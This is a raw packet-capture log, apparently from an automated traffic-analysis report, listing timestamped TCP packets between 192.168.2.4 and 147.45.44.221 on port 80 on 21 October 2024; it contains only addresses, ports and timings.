                                                                                                                                                    Oct 21, 2024 08:47:28.191698074 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191715956 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191728115 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191755056 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191766977 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191792011 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191809893 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191837072 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.229274988 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.229306936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.229325056 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.229393959 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.274852037 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.274883032 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.274916887 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.274936914 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.275029898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.302468061 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302520990 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302544117 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302561045 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302576065 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302613020 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302645922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302679062 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302706003 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.302711010 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302779913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302805901 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.302836895 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302844048 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.302903891 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302933931 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.302939892 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.302983999 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303003073 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303025961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303041935 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303087950 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303092003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303127050 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303141117 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303159952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303174019 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303208113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303214073 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303262949 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303266048 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303318024 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303318977 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303363085 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303375959 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303430080 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303458929 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303507090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303508043 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303589106 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303602934 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303622007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303637981 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303654909 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303668022 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303688049 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303702116 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303723097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303738117 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303757906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303770065 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303792953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303805113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303822994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303839922 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303855896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303879023 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303891897 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303901911 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303925037 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303937912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303962946 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.303971052 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.303991079 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.304013014 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.304023027 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.304043055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.304055929 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.304074049 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.304090023 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.304102898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.304125071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.304136992 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.304158926 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.304171085 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.304193020 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.304205894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.304235935 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.309938908 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.309967995 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310003042 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310007095 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.310015917 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.310038090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310048103 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.310070992 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310103893 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310132027 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.310149908 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.310185909 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310218096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310231924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.310252905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310262918 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.310287952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310302019 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.310326099 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310334921 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.310355902 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.310375929 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.310401917 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.321893930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322020054 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322035074 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322067976 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322091103 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322105885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322124004 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322139978 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322190046 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322191954 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322220087 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322242022 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322273016 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322277069 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322309017 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322309017 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322324038 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322345018 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322355986 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322377920 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322412014 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322428942 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322444916 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322462082 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322479963 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322489023 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322515011 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322529078 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322554111 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.322561979 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.322603941 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.348817110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.348850012 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.348884106 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.348913908 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.348973989 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.394459009 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.394491911 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.394519091 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.394526005 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.394531965 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.394583941 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422118902 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422158003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422174931 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422195911 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422225952 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422251940 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422266006 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422316074 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422343969 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422348976 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422353983 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422420979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422467947 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422488928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422519922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422533989 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422564983 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422571898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422615051 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422621965 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422656059 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422665119 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422684908 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422705889 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422733068 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422738075 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422770023 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422777891 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422802925 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422811031 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422849894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422854900 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422889948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422897100 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422924995 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422930956 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422955990 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422971010 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.422990084 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.422996998 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423022985 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423029900 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423058033 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423063040 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423091888 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423101902 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423126936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423136950 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423160076 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423172951 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423194885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423202991 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423228025 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423238039 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423264027 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423271894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423296928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423305035 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423331976 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423342943 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423365116 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423373938 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423409939 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423439980 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423476934 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423489094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423511982 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423516989 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423546076 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423559904 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423579931 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423600912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423614979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.423619986 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.423656940 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429404020 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429435968 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429471016 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429490089 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429523945 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429584026 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429634094 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429636955 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429667950 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429688931 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429699898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429714918 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429745913 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429754972 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429804087 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429806948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429842949 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429857016 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429872036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429894924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429903984 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429922104 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429938078 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429949999 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.429970980 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.429984093 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.430006981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.430018902 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.430041075 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.430053949 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.430087090 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.441436052 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441485882 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441504002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441519976 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441535950 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441557884 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441572905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441590071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441622019 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441653967 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441649914 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.441683054 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.441689014 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441723108 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441723108 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.441723108 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.441757917 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441790104 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441811085 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.441823006 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.441833973 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.441864014 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.468127012 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.468159914 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.468192101 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.468209028 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.468238115 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.513983011 CEST8049732147.45.44.221192.168.2.4
